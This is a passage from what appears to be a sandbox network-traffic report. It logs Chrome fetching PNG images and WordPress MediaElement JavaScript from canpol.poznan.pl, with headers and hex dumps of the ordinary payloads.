                                                            2025-01-15 10:08:05 UTC6822INData Raw: 38 96 f5 ae 2e 0f 90 a3 93 0b 2d f7 34 d1 7c 2e e3 33 dd 23 9c 02 d6 34 7e 47 86 35 71 6d bf dc d4 ba 44 bd 4a 8b 3d 0d 12 8d 14 22 15 9f 53 32 bd 21 88 e3 84 d1 68 c4 f1 c9 29 8d e3 46 ea 1e 63 98 04 61 d6 d7 92 0a 27 97 a3 58 ab 62 78 0e 61 da d9 82 44 13 fa 3e c1 68 04 61 00 3a fc d2 4a d5 10 45 8c fb 29 21 95 28 25 a4 c6 1a 30 0c 54 ce 43 14 8b 50 a9 52 5c 59 a1 b6 b6 46 bf ef 33 ea 77 89 63 18 b6 ce 39 b8 ff 39 e6 cc 2c 33 f9 02 94 93 f4 c9 42 12 1d 1d 72 70 ff 0b f6 be 78 48 30 18 21 14 8c 14 e4 6a 15 ea b7 ae 53 5e 5e 4c 4d 30 d0 c8 38 46 e9 84 4b fb 8b 58 42 62 20 be 24 fa 97 95 7f 5f 3e 7f f2 85 29 27 10 99 40 a2 65 a7 bb 8f 19 71 74 3a 33 38 05 ac 69 fc 2e b8 d2 a9 dc 6f ba f6 c4 45 d7 c4 50 26 b6 69 61 4a 95 2a 8d 5e 2c 56 8d 12 3a 65 07 64 7d
                                                            Data Ascii: 8.-4|.3#4~G5qmDJ="S2!h)Fca'XbxaD>ha:JE)!(%0TCPR\YF3wc99,3BrpxH0!jS^^LM08FKXBb $_>)'@eqt:38i.oEP&iaJ*^,V:ed}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            100192.168.2.1649817178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC658OUTGET /wp-content/uploads/2015/07/disney_sofia_the_first.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:13 GMT
                                                            ETag: "7c90-620a8b46312e2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 31888
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 32 38 ae 5c 54 b4 00 00 20 00 49 44 41 54 78 da ec bd d9 af 64 c9 99 d8 f7 8b 88 b3 e6 c9 fd de bc 5b d5 bd b5 f6 56 64 77 93 d3 1c 89 23 c9 b6 04 c9 b0 6c c0 02 ec 17 03 86 01 3f 19 98 07 c3 7e b1 fc 68 48 fe 0f bc 01 06 fc 64 c0 f0 bb 01 c3 36 20 78 e0 11 46 33 1a ae 4d 76 57 75 75 ed 75 f7 25 f7 cc 93 67 8d 08 3f 64 35 c9 99 69 72 38 64 37 c9 ee 8e 1f 90 55 85 5a 6e 5d 44 66 fc ce f7 7d 11 f1 05 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME28\T IDATxd[Vdw#l?~hHd6 xF3MvWuuu%g?d5ir8d7UZn]Df}8p8p8p8p8p8
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 41 28 69 b6 20 49 04 e9 4a 91 e7 76 7d 06 d0 83 20 80 66 13 82 18 b4 14 14 f5 3a a5 fd 24 22 0b c3 f5 76 88 65 7e c9 68 fe 21 61 6b 4c 7f cb 12 44 35 9e 6f f1 8d 20 6a 08 bc b0 a0 b4 97 8c 57 1f e1 e9 82 cc 36 a8 6a 85 90 8a 46 b3 81 11 73 8a f9 15 17 cb 29 d1 65 84 d7 ea 71 74 78 cc d5 18 3a bb af 61 aa 9c ba 9e a2 08 90 22 c0 57 8a 4e 7b bd 54 59 d4 96 ac c8 31 a6 c0 88 12 cf ab 09 02 49 5d 1b 6c 29 a9 4a d0 25 3f d9 c3 16 7a 12 5f 0a ac 85 bc b0 64 59 bd de 06 12 7a 24 cd 88 38 89 b0 b9 a0 d2 86 d2 18 8c b4 f8 95 06 bf c4 a3 81 9e fb 4c 4e 2a 96 51 45 94 48 da bd 90 46 b3 83 90 1e 59 51 30 99 4c 01 e8 f5 7a 84 61 e8 26 80 13 d6 ef 26 9f 16 5d 59 6b 29 8a 12 63 2c 9e 17 a0 a4 47 55 4a 66 73 4d 31 57 5c 1e af f8 93 7f f9 1d ce af fe 35 fd cd 13 6e 5d bf
                                                            Data Ascii: A(i IJv} f:$"ve~h!akLD5o jW6jFs)eqtx:a"WN{TY1I]l)J%?z_dYz$8LN*QEHFYQ0Lza&&]Yk)c,GUJfsM1W\5n]
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 38 11 71 b8 c1 fa 5a 83 d3 23 9b a3 83 29 d3 31 dc b8 21 59 ed d6 a9 d5 9c 65 de a0 db e5 f6 9d 36 8b 59 4c 91 b9 cb 00 51 67 4e 96 4d f8 e6 f1 88 4f ff e9 82 a7 df 96 f4 ba 77 e9 ad f6 88 82 39 79 31 a4 4c 72 c8 53 86 a3 4b 4e 4e cf 79 a7 ca 96 c7 28 21 48 73 4d 92 e6 e4 55 82 f1 46 08 ff 14 6d 4a 0a 6b 4e 69 f5 91 76 49 68 a5 84 ee 02 2f 92 48 5b 13 56 39 5a 19 30 15 96 1e 63 59 73 1c 1f fc 7a 45 a9 13 c6 b3 37 24 83 23 aa 6a 86 30 36 a1 bb 4b 7b ed 1a 8d 38 a2 a4 cf c1 eb 37 04 8d 00 cb 0b 90 76 c9 f9 c5 25 2f 9f 1f f0 f4 ab ef 48 27 37 69 06 ef 63 05 03 4a cb a6 d2 21 a5 dd 41 39 21 46 4d c9 39 a6 10 03 7a d7 ee f2 f1 5f 5e 23 0c 25 8f be 7e ce 70 70 40 a5 3d 6c d3 02 e3 23 85 c4 b6 34 8e bb f4 c9 77 3c 41 14 7b f8 81 43 5e 80 b4 5d e2 da 32 0f d1 e8
                                                            Data Ascii: 8qZ#)1!Ye6YLQgNMOw9y1LrSKNNy(!HsMUFmJkNivIh/H[V9Z0cYszE7$#j06K{87v%/H'7icJ!A9!FM9z_^#%~pp@=l#4w<A{C^]2
                                                            2025-01-15 10:08:05 UTC7953INData Raw: f1 64 4e 9e 5d 20 ad 39 2f bf 1b 73 72 30 a7 98 46 5c 94 2e ae 15 82 ea 12 ba 6b 58 c4 a4 69 49 e4 58 b4 82 1a a1 e8 e2 1a a8 84 41 38 05 b9 2a 51 5a 22 95 4d 91 29 8a 40 52 56 cb 28 2c 83 7c fb c0 f4 32 6c 54 6b b4 aa 50 55 46 55 2e 80 0c ad 2c 04 06 8d 41 2b 45 a5 2a 1c cb c5 b6 62 16 e3 80 97 4f 2a d2 c5 f0 ad 1b c3 9c 83 67 86 d0 d9 a1 19 de 66 72 1e 70 f8 da 70 36 b0 58 cc eb 38 6a 85 48 76 d1 95 8b 14 1e ab 2b 2d 9a 35 45 62 34 95 69 61 e4 0a 96 a7 70 5d 89 e3 6b 34 36 77 ee 7e c0 fb ef 7d 4c a3 e1 d2 bf 18 71 72 9a 90 a5 7d 2c e9 50 96 11 97 97 86 d1 58 b2 be 71 8d 5b b7 6e e1 38 1e 27 27 67 9c 9c 9c 72 ff fe 7d e2 38 be ea 8b 2b c0 fa 73 26 da f9 ff bd 5c e3 79 1e ef bf ff 3e ef bd f7 1e 49 92 f0 e4 bb ef 78 f2 f8 31 bf fd e4 37 64 d9 9c 9f fc e5
                                                            Data Ascii: dN] 9/sr0F\.kXiIXA8*QZ"M)@RV(,|2lTkPUFU.,A+E*bO*gfrpp6X8jHv+-5Eb4iap]k46w~}Lqr},PXq[n8''gr}8+s&\y>Ix17d


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            101192.168.2.1649819178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC423OUTGET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC283INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:04 GMT
                                                            ETag: "38a-620a93104f7d1"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 906
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:05 UTC906INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 65 2e 77 70 3d 65 2e 77 70 7c 7c 7b 7d 2c 65 2e 77 70 2e 6d 65 64 69 61 65 6c 65 6d 65 6e 74 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 77 70 6d 65 6a 73 53 65 74 74 69 6e 67 73 3f 6e 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 5f 77 70 6d 65 6a 73 53 65 74 74 69 6e 67 73 29 3a 65 29 2e 63 6c 61 73 73 50 72 65 66 69 78 3d 22 6d 65 6a 73 2d 22 2c 65 2e 73 75 63 63 65 73 73 3d 65 2e 73 75 63 63 65 73 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3b 65 2e 72 65 6e 64 65 72 65 72 4e 61 6d 65 26 26 2d 31 21 3d
                                                            Data Ascii: !function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var e={};return{initialize:function(){(e="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):e).classPrefix="mejs-",e.success=e.success||function(e){var n,t;e.rendererName&&-1!=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            102192.168.2.1649820178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC648OUTGET /wp-content/uploads/2015/07/disney_fairs.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:10 GMT
                                                            ETag: "87b5-620a8b438b75c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 34741
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 33 39 c0 40 55 63 00 00 20 00 49 44 41 54 78 da ec bd f7 8f 64 59 76 e7 f7 b9 cf 86 b7 e9 b3 bc eb ea 6a 6f 67 7a 86 33 3d 74 bb e4 90 4b 72 46 22 64 40 2d 81 15 04 11 a2 b0 02 b4 5a fd 28 ec ea 3f 90 59 80 10 81 05 24 ed 72 05 99 25 a8 a5 15 39 ae a7 67 da 4c 57 75 99 ae ca f2 95 de 44 66 f8 88 e7 ef bd fa 21 b2 ab ab 7b da bb e9 9e be 9f 44 54 a5 89 cc 77 e3 bc b8 df 77 ce 79 e7 9e 0b 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME39@Uc IDATxdYvjogz3=tKrF"d@-Z(?Y$r%9gLWuDf!{DTwwy`0`0`0`0`0`0
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 0b 3c 74 fc 01 2a 8d 2a ab eb 6b 7c 6f f8 7d f6 56 f7 90 bd 84 aa 53 a6 ec 95 90 b1 64 65 65 85 ed bd 1d aa d3 35 96 ee 5c 23 72 12 44 de a2 5a 6a e0 7a 1e 61 1a 10 0c c6 08 a9 d1 6e 86 93 4e 5e 5b 4e 5a 28 29 81 18 df 29 80 e7 90 c4 92 2c ce 50 49 4a c6 90 d0 ce 18 76 03 d2 44 e1 b8 3e 56 b9 0c 96 83 76 34 4a 41 16 db 48 37 4f 46 9e cd 9e e6 c6 76 c2 a9 a9 0a 75 4f a2 b2 21 b6 06 61 29 a6 a7 6a 54 fa 11 af dd be 49 a0 7d 66 0e 1f 26 99 b2 69 88 26 45 7c 7c 04 e2 4d 17 95 8f 47 ac de f4 3d d3 22 d9 08 d6 a7 c9 30 1a b2 b2 b6 cc f2 fa 0a 61 16 90 ea 64 b2 f8 bf 00 f9 99 1c 73 87 e6 a8 54 2a fb 69 f5 89 5c 59 fb 6f dd 8c 8c bd b0 c5 6e d0 22 b2 c6 6c b5 d7 b8 7a f3 32 a3 d1 88 c7 1e 7a 8a d3 f3 0f 33 c5 02 2e f9 fd 69 73 6f 3d 7d 4a c8 98 3d 5a 5c 09 af 70
                                                            Data Ascii: <t**k|o}VSdee5\#rDZjzanN^[NZ()),PIJvD>Vv4JAH7OFvuO!a)jTI}f&i&E||MG="0adsT*i\Yon"lz2z3.iso=}J=Z\p
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 56 af 6f 70 b8 d2 63 63 63 13 2b 2d 8d c9 06 c5 4e 4e d6 cb c8 ad a6 c8 0a 4c 2f 47 8c 34 8e b6 d4 3c 9f 28 88 a9 45 0b 84 cd 1a 35 55 a3 e9 b7 98 88 c7 99 19 9f 65 7a 72 86 c9 e6 04 31 35 24 b0 b3 b7 cd ee f2 3e a3 2c 61 90 0d 39 4c 0e d9 3d d8 61 6b 7b 93 b5 ad 35 76 0e 76 19 e9 94 41 32 a4 db 1f 50 16 06 8c 20 cf 2a a2 9e 4c 83 b6 55 c7 e9 78 d4 83 98 07 8f 1e 54 66 7c d6 e1 b5 57 3e c7 85 b9 f3 9c 99 3b 45 2b ac 93 26 1a 43 86 1b 87 e8 b2 a0 48 33 d0 47 1d 95 00 ab 0c d4 05 7e a7 49 10 04 38 9e 87 13 f8 38 51 40 d4 8a 08 ea 01 ba c8 18 1d 1e 92 0e 12 ac ae f8 a1 d1 de 01 e9 d6 1e 74 35 24 bf c2 37 89 8a 93 d2 1e ec 8d 0a 6e 9a 75 f2 42 93 a7 19 1b 1b 07 6c ef 17 80 a0 cc 4a 8a a1 a6 c8 73 d2 61 4a 56 14 38 c2 43 48 41 29 04 b2 11 e3 c5 31 5a 17 e8 22
                                                            Data Ascii: Vopccc+-NNL/G4<(E5Uezr15$>,a9L=ak{5vvA2P *LUxTf|W>;E+&CH3G~I88Q@t5$7nuBlJsaJV8CHA)1Z"
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 77 3c 5e bc f8 22 93 de 14 0b b3 f3 4c 34 c6 70 80 3c 4b f1 a5 c3 f8 94 8b 15 39 79 9e 11 d5 7d c2 9a 8b e3 09 64 21 70 3d c5 54 73 86 85 f1 33 34 bc 31 1c 82 c7 29 dc c7 75 0c 58 9f 0c 46 09 aa bd 1c f1 eb 80 55 09 1b 2a 4d 95 4b 48 d3 99 60 92 59 76 92 3b 1c 16 0a eb 29 84 23 b1 c2 22 94 05 5b 92 e7 ba ea 62 b4 06 72 ca 72 44 6f bb cb 70 d3 d2 48 a7 f1 ac 78 ec 59 59 95 c1 18 4d a9 33 74 91 90 bb 2e d6 73 70 9a 11 91 17 53 6a cb b0 b7 c2 99 99 69 ae 9c bb 4a e4 d6 91 a5 e1 c9 0b 4f 60 85 a5 2f 12 82 5c 20 47 e5 d1 73 42 db 6b 33 de 99 a0 59 6b 61 13 c3 70 b7 4f 31 c8 b1 05 08 23 8f 6e 36 89 10 12 29 1d 5c 15 90 db 82 3c 33 28 c7 23 aa c5 78 9e 77 94 10 0d 3f ff f0 17 fc cb ff e3 7f 65 cf 19 d2 b9 b4 c0 3b 2b 37 98 9c 9e e1 4c 6b 9e b3 27 17 f9 82 f8 22
                                                            Data Ascii: w<^"L4p<K9y}d!p=Ts341)uXFU*MKH`Yv;)#"[brrDopHxYYM3t.spSjiJO`/\ GsBk3YkapO1#n6)\<3(#xw?e;+7Lk'"
                                                            2025-01-15 10:08:05 UTC2806INData Raw: 1c 3b 61 ee 8e 93 b5 13 1e 3f ae f6 3e ae fc c4 5d 9f bc 3b 10 fe f9 4b ce 74 ce 91 e7 39 69 9a 72 e9 d2 25 b2 2c 3b 1f 45 d1 b2 10 22 2f 46 58 01 ac 87 7f b2 b4 5e 3f 71 e2 c4 9f be fd f6 db 67 db ed b6 6a 36 9b f7 70 c3 3e 1b 58 7d fc 18 c4 03 ef 4e ec e8 ec 3c 16 18 f9 98 d7 fb 59 aa ab 7d d5 f7 77 0e 6b 2d db db db 5c b9 72 c5 3c f7 dc 73 ff 45 6b bd 5e 8c ac bd 5b d1 d6 63 7f 50 e8 b6 db ed 4b fd 7e ff bd ab 57 af 92 24 09 c6 98 22 f9 af b0 3d c1 ca 8c b3 fa af 5e bd 4a bf df 7f af dd 6e 5f 12 42 74 8b b3 53 00 eb 51 01 2b 8b a2 68 f1 ec d9 b3 7f b2 b4 b4 94 6f 6e 6e 92 65 19 d6 da 02 5a 85 ed aa ac b2 2c 63 73 73 93 6b d7 ae e5 67 cf 9e fd 93 28 8a 16 85 10 45 0e 56 01 ac 47 78 c2 a4 dc 98 9f 9f 3f 97 e7 f9 6b 97 2f 5f 66 30 18 90 e7 79 01 ac c2 76
                                                            Data Ascii: ;a?>];Kt9ir%,;E"/FX^?qgj6p>X}N<Y}wk-\r<sEk^[cPK~W$"=^Jn_BtSQ+honneZ,csskg(EVGx?k/_f0yv


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            103192.168.2.1649821178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC653OUTGET /wp-content/uploads/2015/07/disney_descendans.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:11 GMT
                                                            ETag: "3ee5-620a8b44c9d01"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16101
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 2e 35 36 9a 75 54 00 00 20 00 49 44 41 54 78 da ec 9d 77 7c 1d c5 b9 b0 9f d9 dd d3 8b ba 64 49 56 b1 2c cb 55 b6 c1 0d db d8 f4 62 4a 68 81 74 08 24 5f 48 42 ee 4d 81 90 10 52 20 81 10 6e 42 12 b8 e4 52 12 08 c4 81 84 16 7a 31 60 3a ee bd 77 75 c9 ea d2 39 3a 7d 77 e7 fb 43 47 c6 36 ee 36 c6 c0 3c bf 9f 30 3a 3a db 66 77 9e 7d e7 dd 99 59 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1
                                                            Data Ascii: PNGIHDR,r|bKGDCpHYs.#.#x?vtIME.56uT IDATxw|dIV,UbJht$_HBMR nBRz1`:wu9:}wCG66<0::fw}YP(BP(BP(BP(BP(BP(BP(BP(B
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 5e 84 74 9a bc f9 ec 62 d6 2e 5b 4b 34 04 ae 22 b8 f0 7b 53 d8 ba b8 97 79 ff d9 80 d7 04 a7 13 c2 06 0c 99 56 c8 f7 6e bc 82 cd 76 11 ef dc ff 1a 79 7e 2f 85 01 d8 b6 74 21 e3 ce bb 04 e7 20 88 49 03 a9 9b 98 89 08 7e 77 9c b9 4f 3e 48 41 de 26 ba 13 06 19 81 0b 09 e6 57 52 30 6c 2c d7 ff e1 5e 1e be f3 16 6e bf e3 25 4e 5f b2 89 59 9f 9f 8a 9f ad 2c 7c fb 7e 4e 3e f3 cb f4 75 b6 d2 d9 dc 41 a8 a7 1c 21 3c 68 86 17 87 33 c0 55 df fd 31 c9 be 4e 9c 5e 37 68 ce fe c0 5c 0a b0 35 62 89 24 a9 78 84 0c cd c1 1b ff be 9f dc dc 09 74 44 34 72 73 b2 f0 65 95 f4 3f 6f 14 92 ea 69 53 09 64 16 f0 fa 93 f3 b8 e3 d6 b7 38 75 d9 46 be fa ed 73 48 f9 52 d4 d5 3e 4d 7e 6e 1f 48 ab 3f b2 1a 78 86 28 25 f1 44 9c 78 32 49 32 12 67 fc f4 33 18 3f fd 9c 74 74 12 27 23 3f 13
                                                            Data Ascii: ^tb.[K4"{SyVnvy~/t! I~wO>HA&WR0l,^n%N_Y,|~N>uA!<h3U1N^7h\5b$xtD4rse?oiSd8uFsHR>M~nH?x(%Dx2I2g3?tt'#?
                                                            2025-01-15 10:08:05 UTC166INData Raw: 77 dc 71 16 cf 8b 29 02 a3 07 17 ce 76 bd 90 75 34 ee a3 d2 34 60 42 2c ed de 02 b7 4c f7 1b 57 02 26 f0 41 a6 3b 0e 8b 90 10 08 09 11 2c 42 c2 81 63 75 3b c0 cc 70 cb 47 2a 6a 3a c7 19 cd 83 aa f2 bb f2 1c ed c2 9c 99 c3 14 29 4a 78 e6 98 d5 18 17 20 24 9c 16 16 46 d6 2b a4 7e 99 de 48 a7 67 29 96 c8 e9 b4 c4 6a 1d 93 b3 bd 34 6e ab e5 fc c1 23 89 a5 4e 82 eb a8 5d 7d 35 cf a5 b7 66 d7 1b d7 d6 78 36 85 9d 70 10 00 00 00 00 fe 8e 6f 28 45 90 26 a5 b4 66 18 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: wq)vu44`B,LW&A;,Bcu;pG*j:)Jx $F+~Hg)j4n#N]}5fx6po(E&fIENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            104192.168.2.1649822178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC434OUTGET /wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:03 GMT
                                                            ETag: "267aa-620a930fbef5d"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 157610
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:05 UTC7904INData Raw: 2f 2a 21 0a 20 2a 20 4d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 65 64 69 61 65 6c 65 6d 65 6e 74 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 57 72 61 70 70 65 72 20 74 68 61 74 20 6d 69 6d 69 63 73 20 6e 61 74 69 76 65 20 48 54 4d 4c 35 20 4d 65 64 69 61 45 6c 65 6d 65 6e 74 20 28 61 75 64 69 6f 20 61 6e 64 20 76 69 64 65 6f 29 0a 20 2a 20 75 73 69 6e 67 20 61 20 76 61 72 69 65 74 79 20 6f 66 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 28 70 75 72 65 20 4a 61 76 61 53 63 72 69 70 74 2c 20 46 6c 61 73 68 2c 20 69 66 72 61 6d 65 29 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 30 2d 32 30 31 37 2c 20 4a 6f 68 6e 20 44 79 65 72 20 28 68 74 74 70 3a 2f 2f 6a 2e 68 6e 2f 29 0a 20 2a 20 4c 69 63 65 6e
                                                            Data Ascii: /*! * MediaElement.js * http://www.mediaelementjs.com/ * * Wrapper that mimics native HTML5 MediaElement (audio and video) * using a variety of technologies (pure JavaScript, Flash, iframe) * * Copyright 2010-2017, John Dyer (http://j.hn/) * Licen
